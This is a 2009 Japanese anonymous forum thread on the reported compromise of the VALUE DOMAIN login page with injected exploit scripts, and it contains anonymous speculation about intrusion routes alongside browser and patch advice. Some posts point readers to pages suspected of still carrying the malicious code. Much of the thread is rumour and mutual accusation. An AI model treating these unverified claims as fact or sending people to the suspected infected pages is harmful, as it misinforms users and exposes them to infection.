305名無しさん@お腹いっぱい。:2009/07/07(火) 22:59:15 0
気になって一応うちのドメインサイト全チェックしたけど問題なし。

>>304はとりあえずトリップつけてくれ
306名無しさん@お腹いっぱい。:2009/07/07(火) 22:59:56 0
>>304
乗っ取られたっていうドメインさらしてくれないと
釣りかどうか判断できんのだが
307名無しさん@お腹いっぱい。:2009/07/07(火) 23:00:54 0
>>301
>>151とか上のほう少しは読めよ
308名無しさん@お腹いっぱい。:2009/07/07(火) 23:02:10 0
最後にログインしたのはいつ?
該当期間中にvalue-domain.comで何か設定変えた? (クッキー抜かれた?)
309名無しさん@お腹いっぱい。:2009/07/07(火) 23:02:18 0
>>304
やふーやぐーぐるはどうなりますか?
なんらかのウイルスに感染しててちがうとこ見に行ってるとか
あるかもしれない
310名無しさん@お腹いっぱい。:2009/07/07(火) 23:03:27 0
ネタかマジか全然わからんしなあ
311名無しさん@お腹いっぱい。:2009/07/07(火) 23:04:11 0
>>304
以下の情報も教えてほしい:

(1) TLDは何? .com? .net? .jp?

(2) 有効期限はいつまで?
312名無しさん@お腹いっぱい。:2009/07/07(火) 23:06:03 0
ドメインロックしてたかどうかとか。
313名無しさん@お腹いっぱい。:2009/07/07(火) 23:06:35 0
ネタでしょ、登録期限切れだったというオチかな、
314名無しさん@お腹いっぱい。:2009/07/07(火) 23:08:51 0
本当なら大事件だ。ありえん。
315名無しさん@お腹いっぱい。:2009/07/07(火) 23:09:51 0
つーか釣りじゃねーの?
タイミングよすぎるだろ。
316名無しさん@お腹いっぱい。:2009/07/07(火) 23:09:53 0
こんなけ騒いでるのに国から指導とかされないから
アンチが騒いでるだけなんじゃないかと思ってしまうんだが、、
317名無しさん@お腹いっぱい。:2009/07/07(火) 23:10:26 0
> whoisで確認したらIPから所有者情報まで全部書き変わってた。
がネタ臭い
318名無しさん@お腹いっぱい。:2009/07/07(火) 23:10:35 0
悲惨な事になってるな。
仕事でも使ってるのに、洒落にならん…

少し高くても別のところにするしかないかなぁ…
319名無しさん@お腹いっぱい。:2009/07/07(火) 23:12:35 0
>>317
確かに. WHOISにIPは普通出てこない.
320名無しさん@お腹いっぱい。:2009/07/07(火) 23:12:38 0
>>316
ログインフォームを改ざんされたのは事実
個人情報抜かれた可能性があるのも事実
321名無しさん@お腹いっぱい。:2009/07/07(火) 23:12:39 0
だから、ドメイン何よ、
既に登録内容変わっているなら、さらしてもなんら問題無いでしょ。
322名無しさん@お腹いっぱい。:2009/07/07(火) 23:13:17 0
>316
> 国から指導とかされないから

そんなに速攻で動くわけないだろハゲ
323名無しさん@お腹いっぱい。:2009/07/07(火) 23:14:33 0
単一報告では釣り臭さが拭えないね
まあ昨日今日だけでもコンパネログインした人間も相当数いるだろうから今後どうなるか

とりあえず糞デジロ何かアナウンスせいよw
324名無しさん@お腹いっぱい。:2009/07/07(火) 23:14:56 0
実は釣りでした。
食いついたおまいら涙目wwwwwww
325名無しさん@お腹いっぱい。:2009/07/07(火) 23:18:24 0
世界的なニュースになるけで、そんなネタには釣られませんが。
レジストラ/代行がそれやられちゃうと、核爆弾並みの被害ですわ。
326名無しさん@お腹いっぱい。:2009/07/07(火) 23:21:23 0
>>307
ActiveX コントロールを殺しとけばIEでもいいのか
>レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
ttp://support.microsoft.com/kb/972890/
327名無しさん@お腹いっぱい。:2009/07/07(火) 23:22:08 0
>>324
誰も釣られてないだろ
具体性の無い文章で釣ったつもりか?
328名無しさん@お腹いっぱい。:2009/07/07(火) 23:23:00 0
所詮は後釣り宣言
329名無しさん@お腹いっぱい。:2009/07/07(火) 23:23:33 0
つーか釣りだろ
whoisでIPわかるはずないし
あとさっきから報告の続きないし
330名無しさん@お腹いっぱい。:2009/07/07(火) 23:25:23 0
>>325->>329
まあまあ
デジロ社員じゃない方の例の子っぽいからもっと愛に溢れたレスを沢山つけてあげて下さい・・・
お世話かけさせますけどすいませんね
331名無しさん@お腹いっぱい。:2009/07/07(火) 23:29:40 0
      ,――――――ヽ、
   ,/           ~\
  /   ,へ_Vへ__    ~\
/   ノ         ゜ー-、  `ヽ
|    ノ / ̄\   / ̄~ヽ ヽ    i
|   ノ              |  ノ
\  |  <●>  <●>  (  )
 \ |      | |       i /
    |      /  ヽ       レ そろそろ僕の出番ですね
   i     (●_●)      / IPAの誇りをかけて
    i、    ,-――-、   ・ / ValueDomainを
    i、  <(EEEEE)> ∵/
      i、   \___/  _/ まピョーん☆
       \       ,ノ
  ,,.....イ.ヽヽ、ー-―一ノ゙-、.
  :   |  '; \_____ ノ.| ヽ i
      |  \/゙(__)\,|  i |
      >   ヽ. ハ  |   ||
332名無しさん@お腹いっぱい。:2009/07/07(火) 23:32:08 0
デジロックの技術水準っていうか、レベルの判定って難しい気がする。
ネームサーバーだって、ハッキリ言えば、どこでも危険で、bindの話しだし、
login.phpが書き換えられたってのは、本当にどんなセキュリティを突かれたのか、
興味深いな。
確かなのは、zendでコンパイルしていないっぽいのと、何からの
穴があったとのでは?と推測の領域。ディレクトリをdigできる様なアップロードするような
仕組みがあったと思えないんだよな。FTPなんか空いているわけないし、
不審な部分と言えば、決済の外部業者渡しくらい?
しかし、これもクレカの処理を内部で行っていない分、セキュアだしな。
333名無しさん@お腹いっぱい。:2009/07/07(火) 23:37:01 0
> FTPなんか空いているわけないし 云々

なぜ言い切れる?
334名無しさん@お腹いっぱい。:2009/07/07(火) 23:37:59 0
先月のイベントでムームーに逃げて良かった…と思いたいが…
XREA+の更新時期なんだよ〜
やべぇ
閉鎖もできん…
335名無しさん@お腹いっぱい。:2009/07/07(火) 23:38:33 0
>>333
俺なら閉じる。
百歩譲って、FTPSでお願いします。
336名無しさん@お腹いっぱい。:2009/07/07(火) 23:43:48 0
まっとうなネットサービス系の会社ならFTP開けたりせんのだけどな
337名無しさん@お腹いっぱい。:2009/07/07(火) 23:46:36 0
まっとうなら、な。
そんなの百も承知で聞く。

なぜ言い切れる?
338名無しさん@お腹いっぱい。:2009/07/07(火) 23:47:06 0
普通に外注のシナチク技術者の仕業かなと思ったんだけど
それだったらlogin.php弄る理由がないんだよね…
339名無しさん@お腹いっぱい。:2009/07/07(火) 23:48:05 0
>>337
> $ ftp www.value-domain.com
> Connected to www.value-domain.com.
> Connection closed by remote host.
340名無しさん@お腹いっぱい。:2009/07/07(火) 23:48:40 0
>>337
統計的な話になるのだが、この種の事故の大部分は
サーバーサイド言語で作られたプログラムの穴が大半です。
ポートの穴やハード的な原因は最後の最後に疑うべきというのが、
今風じゃないのかな?
341名無しさん@お腹いっぱい。:2009/07/07(火) 23:49:59 0
>>339
おいおい、FTPデーモンがおるやんけ 汗
342名無しさん@お腹いっぱい。:2009/07/07(火) 23:50:05 0
login.php、login.phpって言ってるやつ、ちょっと必死すぎない?
343名無しさん@お腹いっぱい。:2009/07/07(火) 23:51:14 0
login.php、login.php
344名無しさん@お腹いっぱい。:2009/07/07(火) 23:54:35 0
SSHじゃなくて、telnetが開いていたに1票
345名無しさん@お腹いっぱい。:2009/07/07(火) 23:54:49 0
そういやユーザーフォーラムには誰も投稿してないよね
必死なのは2ちゃんだけだな
346名無しさん@お腹いっぱい。:2009/07/07(火) 23:56:56 0
>>339
他からうpできる穴がある可能性は?
347名無しさん@お腹いっぱい。:2009/07/07(火) 23:57:41 0
すべてのことが釣りだった場合は、釣られた。
348名無しさん@お腹いっぱい。:2009/07/07(火) 23:57:48 0
ユーザーフォーラムに行くのですら危険だと思ったら、投稿されていなくて当然だろう
349名無しさん@お腹いっぱい。:2009/07/08(水) 00:00:44 0
>>346
イワユル、ウェルノウンポートと言われるポートでは、難しいので、
そうじゃない、ポートとか?
DNSが開いていてもそう簡単には掘れないと思うし、対策済みかと
350名無しさん@お腹いっぱい。:2009/07/08(水) 00:03:59 0
>>345
キーロガーの存在に気がつかなかった可哀想なユーザーが、いつも通りログインし、ユーザーフォーラムを使っているのだよ
351名無しさん@お腹いっぱい。:2009/07/08(水) 00:06:06 0
telnetとかftpあけたままとか・・ど素人なのか?
技術者が抜けて今や素人だけで運営してるとか?
352名無しさん@お腹いっぱい。:2009/07/08(水) 00:08:43 0
知ってる奴はヤバいのでフォーラムに近寄らない

誰も警告を発しないし、当然デジロからのニュースリリースも無い

知らない奴は普通にフォーラムに書き込もうとログイン

マルウェア増殖、仕掛けた奴(゚д゚)ウマー

とこういう自体な訳だな
353名無しさん@お腹いっぱい。:2009/07/08(水) 00:13:17 0
昨日、リアルタイムで改ざんされてたの見たけど、
魚拓とか、それに続く状況報告とか、詳細まで踏み込まれはじめたときに、
ふと気づいたら改ざん部分が戻っていたんだよな

せめて改ざんへの対応をしたのか否かくらいは早く告知ほしいが、
その告知がでたところで、この状況じゃ、告知それ自体が改ざんかもしれない
354名無しさん@お腹いっぱい。:2009/07/08(水) 00:16:32 0
ちょっと質問なんですが、
ユーザーサポートの
http://sb.xrea.com/
vBulletinが改ざんされたってことでしょうか?
value-domainのloginがやられたかと思ってたよorz
355名無しさん@お腹いっぱい。:2009/07/08(水) 00:20:38 0
>>354
value-domainのloginページが改ざんされていた
現在は修正されているが、告知はない
356名無しさん@お腹いっぱい。:2009/07/08(水) 00:21:38 0
>>355
それなら告知すべきことですね。ヤバイレベルです。
vBulletinはOSSなんでセキュリティホールもあり得るので。
357名無しさん@お腹いっぱい。:2009/07/08(水) 00:22:26 0
value-domain.comのlogin.phpを書き換えられる環境にある奴が
sb.xrea.comのvBulletinのログインに手出してないと考える方が甘いって事だろ
358名無しさん@お腹いっぱい。:2009/07/08(水) 00:32:25 0
login.php自体が書き換えられたかは未だ不明でしょ?
359名無しさん@お腹いっぱい。:2009/07/08(水) 00:32:39 0
真偽確認&アナウンスするはずの対応部署とやらに連絡がいったとされる時間から、もうすぐ24時間

さて、これは告知まで何日かかるかな
360名無しさん@お腹いっぱい。:2009/07/08(水) 00:34:01 0
>>358
それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か
361名無しさん@お腹いっぱい。:2009/07/08(水) 00:48:06 0
今でもその改竄された時点での魚拓とかある?
362名無しさん@お腹いっぱい。:2009/07/08(水) 00:49:37 0
>>361
>>92がまだ見られるんじゃないかな
363名無しさん@お腹いっぱい。:2009/07/08(水) 00:49:53 0
改竄事件は、他社工作員の捏造。。気にする必要なし。
デジロのセキュリティは万全。
364名無しさん@お腹いっぱい。:2009/07/08(水) 00:50:55 0
>>363
今日は遅出勤務なの?
何時まで?
365名無しさん@お腹いっぱい。:2009/07/08(水) 01:02:01 0
いまだ何もアナウンスがないなんて企業としてどうかしてる。
366名無しさん@お腹いっぱい。:2009/07/08(水) 01:03:21 0
>>354のサポートページ自体はソースに
>>31-32の変数コードなかったけど
ログインしてみないと、その先は分からないからな
フォーラムもトップは大丈夫だけど
ログインしてみないと分からない

>>362  
魚拓はコード残ってるから開かないほうがいい
367名無しさん@お腹いっぱい。:2009/07/08(水) 01:03:30 0
何もなかったから、アナウンスなど無くて当然。
これは、捏造事件です。
368名無しさん@お腹いっぱい。:2009/07/08(水) 01:08:11 0
>>367
隠蔽する気マンマンだなぁ
369名無しさん@お腹いっぱい。:2009/07/08(水) 01:10:04 0
公的ぽいところに届出が無い限り、
がせだと思って良いかな?
http://www.ipa.go.jp/security/
370名無しさん@お腹いっぱい。:2009/07/08(水) 01:11:38 0
釣りにマジレスするのもなんだけど
ガセだ捏造だと主張する人は
魚拓もグルだと言うつもりなんだろうか
371名無しさん@お腹いっぱい。:2009/07/08(水) 01:12:48 0
土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、
淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ
372名無しさん@お腹いっぱい。:2009/07/08(水) 01:16:17 0
>>370
釣りにマジレスすんなよ、と言わせていただこう
373名無しさん@お腹いっぱい。:2009/07/08(水) 01:18:50 0
スラッシュドットジャパンでよければ
ttp://slashdot.jp/firehose.pl?op=view&id=117594
374名無しさん@お腹いっぱい。:2009/07/08(水) 01:20:17 0
>>360
それはともかく て。違いが分からないの?
375名無しさん@お腹いっぱい。:2009/07/08(水) 01:33:00 0
徐々にニュースサイト系に情報広がってるね
これがVD流の七夕祭りですか
376名無しさん@お腹いっぱい。:2009/07/08(水) 01:35:33 0
>>369
脆弱性有無の調査方法
DNSキャッシュポイズニングの脆弱性の有無を確認
http://www.ipa.go.jp/security/vuln/documents/2008/200809_DNS.html

* porttest.dns-oarc.net -- Check your resolver's source port behavior
* https://www.dns-oarc.net/oarc/services/porttest

* txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior
* https://www.dns-oarc.net/oarc/services/txidtest

* IANA ― Cross-Pollination Scan
* http://recursive.iana.org/

この3つで確認すればいいのかな?
377名無しさん@お腹いっぱい。:2009/07/08(水) 01:42:17 0
さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒
378名無しさん@お腹いっぱい。:2009/07/08(水) 01:43:34 0
コードは確かに書き加えられてたよ。
ここに貼られてたソースもハッキリ見た。

昨夜9時頃ログインしたが今のところ何ともない。
今後どうなるかはわからんが...
明日俺のサイト書き換えられてたりして...orz
379名無しさん@お腹いっぱい。:2009/07/08(水) 01:43:58 0
「VDウイルス」
「デジロウイルス」

悪くないな
380名無しさん@お腹いっぱい。:2009/07/08(水) 01:58:29 0
コードが書き換えられていたのなら、

それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。
アナウンスが無いのはコード書き換えなど無かったからです。
他社工作員の捏造にだまされないように、
381名無しさん@お腹いっぱい。:2009/07/08(水) 02:00:36 0
>>376は全然ちがったみたい
>>369見る前はこれかと思ったんだけど

でも、ログインは関係ないのか?
もしかして、ServerとClientは
別物と何度言ったら(nyってやつ?
382名無しさん@お腹いっぱい。:2009/07/08(水) 02:06:45 O
>>380

ノシ >>286
383名無しさん@お腹いっぱい。:2009/07/08(水) 02:08:33 0
>>286の読み方がわからない
384名無しさん@お腹いっぱい。:2009/07/08(水) 02:12:13 0
隠蔽しようと頑張ってるとしか思えんわ
385名無しさん@お腹いっぱい。:2009/07/08(水) 02:48:42 0
なんだかすごいことになったみたいだね
よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに…
firefoxだけど大丈夫なのかしら
386名無しさん@お腹いっぱい。:2009/07/08(水) 02:52:26 0
>>340
まあそういう穴もあるんだがGeno系は違う場合もあるからねえ
今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない
Genoのときもそうだったけど被害サイトが特定のCMSや
Webサーバじゃなかったんで最初混乱した

データを抜いたんじゃなくてPHP書き換えちゃってるんだしね
こういう流れも考えられるよってかんじで参考程度だけど
中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ)
387名無しさん@お腹いっぱい。:2009/07/08(水) 02:52:41 0
>>385
ログイン処理の部分で書き換えられていたならばアウト
報告が無いのでどこまで書き換えられたかは判らないが。
388名無しさん@お腹いっぱい。:2009/07/08(水) 02:53:34 0
>>385
FirefoxであればAdobe製品を最新にしていれば
クライアント側は大丈夫かもしれない
389名無しさん@お腹いっぱい。:2009/07/08(水) 02:57:00 0
>>387
そうなのか…ありがとう
JSは大丈夫だったとしてもログイン処理のほうが問題だよね
こればっかりはどうしようもないから報告待ちするしかないなぁ…
390名無しさん@お腹いっぱい。:2009/07/08(水) 02:59:20 0
>>388
GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう
教えてくれてありがとう
391名無しさん@お腹いっぱい。:2009/07/08(水) 03:13:24 0
去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。
今回改竄されたVDのサーバが、sakura2.digi-rock.com。
また、さくらインターネットに置いているサーバだな。
392名無しさん@お腹いっぱい。:2009/07/08(水) 03:33:50 0
>>388
いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。
HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで
393名無しさん@お腹いっぱい。:2009/07/08(水) 03:39:37 0
('A`)アアアァァァァァァァァァァァ....
.
三年寝太郎の俺が
久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。

流し読みだけど↓で合ってる?


 login.phpが書き換えられた。
 
 @ 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890
 
 A login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/
394名無しさん@お腹いっぱい。:2009/07/08(水) 03:43:12 0
>>392
そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加)
395名無しさん@お腹いっぱい。:2009/07/08(水) 03:47:41 0
>>394
既にOperaの標準機能でプラグイン停止して運用してる
外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利
396名無しさん@お腹いっぱい。:2009/07/08(水) 03:49:43 0
>>394
ドメイン毎に設定できるのが魅力だけど
許可サイトに加えていくなど、ある程度熟練した人向けだと思う
しっかり設定しないと、動画も表示されないからね
397名無しさん@お腹いっぱい。:2009/07/08(水) 03:50:45 0
>>393
変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ
どれかにヒットすれば感染おめでとう

サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね
価格.comの改悪型Genoメソッドだ

他の攻撃サイトでもIEをターゲットにしているものは多いし
IEをメインブラウザとして使うのは危ないね
398名無しさん@お腹いっぱい。:2009/07/08(水) 03:59:23 0
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
thx、何でGENOの話をしてるのか分かってなかった。
pdf,swfもあったのね。


 login.phpが書き換えられた。
 
 @ 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890

    → 変な pdf と swf を読まされる。
     → 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな!?
      → Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。
 
 A login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/
400名無しさん@お腹いっぱい。:2009/07/08(水) 04:14:03 0
>>396
そうなんだよね
わけわかめな人についてはNoScriptは入れないほうが良いとおもう

ただ、IEが一番狙われてるのは確実だからNoScriptなしでも
Firefox(その他のブラウザ含む)のがマシと考えられる
Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
IE8にもそういう機能がついてるけど踏まないと報告できないようなので
少なくとも一回罠にかからなきゃいけないんだよね・・・
それとも見落としていただけで報告サイトあるんだろうか

どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね

ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく
IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない
Google Chromeはたとえブラウザの脆弱性があったとしても
サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな
401名無しさん@お腹いっぱい。:2009/07/08(水) 04:18:55 0
402名無しさん@お腹いっぱい。:2009/07/08(水) 04:19:26 0
>>399
ここの人は大丈夫だと思うけど、念のためGeno関連補足
AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨
また、Reader自体使用していないならアンインストールしたほうが無難
メーカー製PCの場合は勝手に入ってることが多いので使用していなくても
インストールされていないか要確認
403名無しさん@お腹いっぱい。:2009/07/08(水) 04:39:35 0
これってreader入れてなければflashプレイヤー入ってても感染しないの?
404名無しさん@お腹いっぱい。:2009/07/08(水) 04:40:40 0
>>399
これってブラウザのスクリプト切ってても感染するの?
405名無しさん@お腹いっぱい。:2009/07/08(水) 04:42:23 0
>403
だから FlashPlayer は最新にしろとあれほど
406名無しさん@お腹いっぱい。:2009/07/08(水) 05:11:23 0
要するにAdobe私ねってことだ
407名無しさん@お腹いっぱい。:2009/07/08(水) 06:27:28 0
>>405
してるよ。
IE6
flashplayer最新
reader無し
408名無しさん@お腹いっぱい。:2009/07/08(水) 06:52:32 0
ttp://support.microsoft.com/kb/972890/
をやってないならアウト
409名無しさん@お腹いっぱい。:2009/07/08(水) 07:12:59 0
>>408
やってないみたいだけど感染してるかどうかってどこで見分けるの?
GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし
アプリケーションが糞重くなるって聞いたけど特に変化無いし
PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。
410名無しさん@お腹いっぱい。:2009/07/08(水) 07:22:13 0
動画見ないからそもそもフラッシュのプラグイン入れてないなw
411名無しさん@お腹いっぱい。:2009/07/08(水) 08:00:03 0
横になったら寝てた
>>400
>Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
寝る前に、そういうサイト踏んだら、そうなった
今IE7でやってみたら、危険なドメイン開いた
>>408やってなかったからか
412名無しさん@お腹いっぱい。:2009/07/08(水) 08:11:37 0
>>409
バックドアかキーロガーだから見つかりにくいように作ってるだろう。
regeditが起動しないみたいなあからさまな挙動はない。
私は感染してないので、がんばって見分け方を見つけてね。
413名無しさん@お腹いっぱい。:2009/07/08(水) 08:24:11 0
見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう
>>411はただのエロサイトだった
それを今回のアドレスでやればいいのかな
414名無しさん@お腹いっぱい。:2009/07/08(水) 09:15:22 0
うっかり砂箱の中で>>408やったらループった
試すアドレスは >>286のでいいのか
FireFox、Chromeはブロックしてくれたけど
IEが接続できなきないだけで、もう一つ分からない
IE8にしないと駄目か

415名無しさん@お腹いっぱい。:2009/07/08(水) 10:01:07 0
IE8にしてみたけどInternet Explorer ではこのページは表示できません
って出るから、これだとブロックしてくれてるのかどうか分からん
うちのモデムの接続もともと不具合だし
416名無しさん@お腹いっぱい。:2009/07/08(水) 10:05:43 0
なんでここがさくらのサーバ使ってんのかと思ったら、
自前のだと良く落ちるからかな?
417名無しさん@お腹いっぱい。:2009/07/08(水) 10:06:38 0
で、結局何?今回の騒動は釣りじゃないのか?

なんか最近思うんだが、ムームードメインとお名前が必死じゃないか?

おれはムームーでのcomドメイン管理を止めた。

使い勝手の悪いムームードメインから
デザインが悪くても管理の楽なバリュードメインにしたよ。
おれと同じようなユーザーは多数いるだろうね。

今回の件、ムームー社員が工作しているように見えるから不思議。
418名無しさん@お腹いっぱい。:2009/07/08(水) 10:10:07 0
それより、お前らどこに引っ越したんだよ
419名無しさん@お腹いっぱい。:2009/07/08(水) 10:10:41 0
■Slashdot.jp
VALUE DOMAIN のログイン ページ改ざん
ttp://slashdot.jp/firehose.pl?op=view&id=117594

■リネージュ資料室
VALUE DOMAINログインページ改竄
ttp://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN

■セキュリティホールMEMO
バリュードメインでこの欠陥を利用した攻撃が発生
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090707_tuiki
420名無しさん@お腹いっぱい。:2009/07/08(水) 10:14:45 0
早く公表してくれ


5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ


今回の件ばかりは隠すことは出来ない


下手すれば・・・
421名無しさん@お腹いっぱい。:2009/07/08(水) 10:16:01 0
ゴクリ...
422名無しさん@お腹いっぱい。:2009/07/08(水) 10:28:29 0
釣られないぞ・・・
423名無しさん@お腹いっぱい。:2009/07/08(水) 10:34:25 0
問題が発生した時点でのウイルス検体を拾った人が大勢いる
あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ

zxshell晒しsage
424名無しさん@お腹いっぱい。:2009/07/08(水) 10:35:55 0
おっと早漏

△ウイルス検体を拾った人
○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人
425名無しさん@お腹いっぱい。:2009/07/08(水) 10:53:53 0
中国か、GMOに身売りになったらイヤだな
426名無しさん@お腹いっぱい。:2009/07/08(水) 11:06:16 O
デジロウイルスのアナウスまだぁ?
427名無しさん@お腹いっぱい。:2009/07/08(水) 11:35:27 0
対策してて大丈夫な人、ここ見ても平気か試してくれよ
ttp://dnf.wikiwiki.jp/
428名無しさん@お腹いっぱい。:2009/07/08(水) 12:01:22 0
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F403.html&hua=
上のソースで問題の部分は./er/pr.phpだよね
429名無しさん@お腹いっぱい。:2009/07/08(水) 12:03:55 0
どうしちゃったんだよVALUEDOMAIN…
430名無しさん@お腹いっぱい。:2009/07/08(水) 12:07:38 0
>>428はURL間違ってね?
431名無しさん@お腹いっぱい。:2009/07/08(水) 12:22:32 0
デジロックは公式アナウンスをしない気か?
GIGAZINEとか他のニュースサイトでも取り上げてくれれば、
ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。

あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。
432名無しさん@お腹いっぱい。:2009/07/08(水) 12:26:31 0
公式アナウンスしないっていうより、できないのかも
何が起こったのか把握できる技術者が外注にもいないんだよ、きっと
433名無しさん@お腹いっぱい。:2009/07/08(水) 12:29:40 0
デジロが無視できない状態にしたいのであれば、
国に動いてもらえばよかろう
434名無しさん@お腹いっぱい。:2009/07/08(水) 12:41:50 0
国に動いてもらいたいなら正式に通報しろよ
誰もやってないんだろ
435名無しさん@お腹いっぱい。:2009/07/08(水) 12:44:57 0
>>430
>URL間違ってね?
って、そういう意味か
>>427のソースはこっち
view-source:http://dnf.wikiwiki.jp/
>>428で問題だったインラインフレームタグって
./er/pr.phpだろう?
まったく同じのはなかったけど
それで安全ってことでいいのか?
こっちはiframeどころかHTMLも碌に
知らないんだから分かる人よろしく
直踏みの感想は特に問題なかったけど
当方の環境で問題なしとしか言えない
436名無しさん@お腹いっぱい。:2009/07/08(水) 12:47:22 0
>>434
誰もやってないだろうね
ここのユーザーは、基本的に法の知識も低い傾向があるしな
437名無しさん@お腹いっぱい。:2009/07/08(水) 12:51:27 0
>>436
お前とかな
438名無しさん@お腹いっぱい。:2009/07/08(水) 12:54:07 0
お子様が紛れ込んでいるようです。
439名無しさん@お腹いっぱい。:2009/07/08(水) 12:54:28 0
法の知識が低いとなんかまずいのかね?
頭でっかちの知識自慢は嫌われますよ〜
440名無しさん@お腹いっぱい。:2009/07/08(水) 12:56:55 P
>>436
ググレカスの人ですか?
441名無しさん@お腹いっぱい。:2009/07/08(水) 13:00:04 0
んで今はどんな状況よ

FTP侵入

サイト改竄

ウイルス埋め込み

だけならいいが、
FTPに入られてDBに接続するプログラムを見て、
DBの顧客情報をもってかれていたら終了だろ
442名無しさん@お腹いっぱい。:2009/07/08(水) 13:03:45 0
関係あるかな?

韓国で大規模サイバー攻撃、大統領府など被害
ttp://www.nikkei.co.jp/news/main/20090708AT2M0800Z08072009.html
443名無しさん@お腹いっぱい。:2009/07/08(水) 13:04:07 0
アナウンスないと、突っ込んだ話は正直わからないよねぇ
444名無しさん@お腹いっぱい。:2009/07/08(水) 13:05:49 0
>>440
>>141で規約に謳ってあると言われて
いなくなっちゃったよ
ソース>>142
445名無しさん@お腹いっぱい。:2009/07/08(水) 13:19:02 0
規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて
446名無しさん@お腹いっぱい。:2009/07/08(水) 13:42:26 0
>>445
責任と取るべく努力はするが、ダメだったら許してね
ってことだが、実態は無責任に近いなw

さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる
可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・
447名無しさん@お腹いっぱい。:2009/07/08(水) 13:47:29 0
ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は
該当スレでどうぞ。

デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん
でそういう話は該当スレで頼む。
448名無しさん@お腹いっぱい。:2009/07/08(水) 13:49:52 0
レンタルアクセス解析サービス 謎のあやしい文字 & う ・・・
いまは、でない。気のせいだったのか・・・ 気のせいだったんだろうなぁ
でも、どこででたんだろう・・・ いまいち記憶が・・・
449名無しさん@お腹いっぱい。:2009/07/08(水) 13:56:22 0
今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ

DigiRoウイルス

かなぁ?
450名無しさん@お腹いっぱい。:2009/07/08(水) 13:59:25 0
大阪ウィルスだろww
451名無しさん@お腹いっぱい。:2009/07/08(水) 14:03:15 0
移管しようにも怖くてログインすらできんのだが…
ある程度の安全が確保されてから全移管する
452名無しさん@お腹いっぱい。:2009/07/08(水) 14:19:20 0
>>451
全部一気に移管するならログインしても問題ないだろ
終わってしまえばもう関係ないんだからさ
453名無しさん@お腹いっぱい。:2009/07/08(水) 14:35:39 0
俺も怖くてログインできないクチなんだよな…
入金したから、その申請をしたかったんだが…

正式なアナウンスしないつもりなのかな?
454名無しさん@お腹いっぱい。:2009/07/08(水) 14:42:42 0
ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ

被害が出たらそりゃ凄い事になりそうだけどなw
455名無しさん@お腹いっぱい。:2009/07/08(水) 14:43:05 0
ソースは2ちゃんとか走りすぎじゃない?
何処も自身で確認した訳でもなく、そーすは2ちゃんって言ってるじゃん
しかも個人ブログとかどう信用しろっていうんだ

>>451
俺ログインしまくってるけど特になにもないよ
456名無しさん@お腹いっぱい。:2009/07/08(水) 14:45:43 0
何か言う前に同一スレ内くらいざっと読めよ
